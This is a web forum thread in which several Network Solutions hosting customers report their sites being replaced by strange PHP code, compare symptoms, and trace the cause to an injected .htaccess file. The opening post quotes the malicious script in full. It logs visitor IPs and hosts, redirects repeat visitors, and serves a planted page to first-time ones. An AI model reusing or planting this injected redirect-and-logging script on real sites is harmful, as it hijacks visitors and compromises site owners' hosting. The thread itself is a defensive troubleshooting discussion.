Website Down, Mystery Code In Its Place

[MattyboyPHP]

A client's website was running fine. Suddenly the code below appears instead of their website. Caveats: it works fine on a Mac. Some PC users see the code and others do not. If you hit the refresh button, the website reappears. Has anyone seen this code before? Thanks.

 

<? $google="http://google.com"; $checker_ip="212.117.164.85"; $_SERVER['REMOTE_ADDR']=explode(", ",$_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR']=$_SERVER['REMOTE_ADDR'][0]; // --------------------------------------------------------------------- $time=@date(DATE_RFC822); $host=$_SERVER['HTTP_X_FORWARDED_HOST']; $file= @date("Y-m-d_h"); // --------------------------------------------------------------------- // if not set HTTP_X_FORWARDED_HOST || domain name if(!$host)exit(header("Location:{$google}")); // if not set REAL IP if(!$_SERVER['HTTP_X_FORWARDED_FOR'])exit(header("Location:{$google}")); // --------------------------------------------------------------------- $IP = "{$_SERVER[REMOTE_ADDR]}.log"; function _log() { global $IP; touch (".tmp/{$IP}"); } function _check() { global $IP; if(!file_exists(".tmp/{$IP}")) return true; } if(!_check() && $_SERVER['REMOTE_ADDR'] != $checker_ip) { if(!$host)exit(header("Location:{$google}")); if(!$_SERVER['HTTP_X_FORWARDED_FOR'])exit(header("Location:{$host}")); exit(header("Location:http://{$host}")); } _log(); // --------------------------------------------------------------------- if ( strpos($host, "thedetroitbureau.com") === false) wr_file_a("logs/{$file}", $time. " > ".$host. " > " .$_SERVER[REMOTE_ADDR]. "\n"); // --------------------------------------------------------------------- echo file_get_contents( "cisco.htm" ); function wr_file_a($fname, $content) { if(strlen($content) == 0) return 0; $fpp = @fopen($fname, "a+"); if ($fpp) { @flock($fpp, LOCK_EX); @fwrite($fpp, $content); @flock($fpp, LOCK_UN); @fclose($fpp); return 1; } return 0; }

[Pikachu2000]

Does that code belong to them?

 

If it does, what are the chances that short open tags were recently disabled in the server's php.ini?

[MattyboyPHP]

No one knows where the code is from or why it suddenly appeared. The website is pure xhtml and css. I've run it off of my server and it's fine. Is this something to take up with the web hosting company? Why would anyone change the php.ini?

[harvey]

My website recently showed the same symptoms. I noticed that this code appears only with IE, not with Firefox.

Currently my webhost is looking into the possibility that this is a code injection.

[716Studio]

Same thing happened to us.  We have a support ticket out for this with Network Solutions, hope to hear back soon.  What stinks is that it applies to EVERY domain that we're hosting through that account, so everyone is down.

[harvey]

Network Solutions corrected the problem in about 24 hours. I got this reply:

  "Dear ____

  I removed the malicious code that was placed in your account causing the issue. I apologize for any inconvenience 

  this issue caused.

  If you have any other questions please visit our comprehensive support section at

  http://www.networksolutions.com/support/ or contact our Support Center and refer to Service Request ____

  and a specialist will be happy to further assist you and ensure that we completely resolve your issue as

  quickly as possible."

 

Since I don't think this was a problem in my code, I asked for more details from Network Solutions. No response so far.

[716Studio]

Just got off the phone with "tech" support at NS.  He told me that it a Google app had been hacked and therefore there was nothing they could do about it, and that "they cannot re-write my code for me."  After turning quite red, I thanked him and hung up.  I hope that I get a similar answer to what you got from the help ticket I opened up

[harvey]

If you call them back, you have my permission to refer to my Service Request 1-498655279 - in which the same  symptoms were exhibited, and which Network Solutions resolved.

[716Studio]

Soooo, I'm an impatient SOB.  I searched for "code injection" and got some ideas, AND, low and behold:

 

I looked in the root of my hosting package (htdocs, in this case for NS, could be public_html, etc. for cpanel users) and found an alien .htaccess file that shouldn't have been there.  I deleted it and magic happened.  All of my sites are back up and running.

 

Ps - Thank you for providing your service ticket Harvey, I did open another ticket with that reference so hopefully they can expedite service in the future.  I hope this helps anyone else with this problem.

[MattyboyPHP]

Thanks for all these responses. I am really surprised, but I suppose I shouldn't be. My client's site is also hosted by NS. This is the 2nd time their htaccess file has been hacked.